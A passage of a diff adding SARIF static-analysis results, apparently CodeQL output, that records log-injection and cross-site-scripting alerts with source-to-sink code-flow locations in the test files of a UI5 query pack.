"location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 15, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 15, + "startColumn" : 18, + "endColumn" : 41 + } + }, + "message" : { + "text" : "`[INFO] ... value}`" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 24, + "startColumn" : 18, + "endColumn" : 42 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e197b363f9dc3962:1", + "primaryLocationStartColumnFingerprint" : "13" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... , true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 24, + "startColumn" : 34, + "endColumn" : 40 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 24, + "startColumn" : 18, + "endColumn" : 42 + } + }, + "message" : { + "text" : "`[INFO] ... alue1}`" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "45280b24f3d81287:1", + "primaryLocationStartColumnFingerprint" : "12" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "req.responseText" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "req.responseText" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 5, + "startColumn" : 27, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "92dbc37bdafc7694:1", + "primaryLocationStartColumnFingerprint" : "22" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 5, + "startColumn" : 27, + "endColumn" : 32 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 12, + "startColumn" : 27, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "faa1832c387d2ee5:1", + "primaryLocationStartColumnFingerprint" : "22" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 12, + "startColumn" : 27, + "endColumn" : 32 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 33 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "8291f53a2e235d15:1", + "primaryLocationStartColumnFingerprint" : "22" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 132, + "startColumn" : 7, + "endLine" : 134, + "endColumn" : 16 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "63ace7b071639814:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 23, + "startColumn" : 25, + "endColumn" : 48 + } + }, + "message" : { + "text" : "oSearch ... Value()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 23, + "startColumn" : 11, + "endColumn" : 48 + } + }, + "message" : { + "text" : "searchValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 27, + "startColumn" : 34, + "endColumn" : 45 + } + }, + "message" : { + "text" : "searchValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 17, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 133, + "startColumn" : 8, + "endColumn" : 27 + } + }, + "message" : { + "text" : "oControl.getTitle()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 132, + "startColumn" : 7, + "endLine" : 134, + "endColumn" : 16 + } + }, + "message" : { + "text" : "\"
T ...
\"" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 23, + "startColumn" : 25, + "endColumn" : 48 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + }, + "region" : { + "startLine" : 14, + "startColumn" : 23, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "fc87b07640e9d85:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 267 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + }, + "region" : { + "startLine" : 14, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + }, + "region" : { + "startLine" : 14, + "startColumn" : 32, + "endColumn" : 50 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "352d5eac262ae765:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 276 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + }, + "region" : { + "startLine" : 14, + "startColumn" : 32, + "endColumn" : 50 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + }, + "region" : { + "startLine" : 14, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "352d5ec8b0c3bb0d:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 285 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 37 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + }, + "region" : { + "startLine" : 14, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 27, + "startColumn" : 36, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "8ceecee7055f4fa2:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 26, + "startColumn" : 25, + "endColumn" : 42 + } + }, + "message" : { + "text" : "oInput.getValue()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" 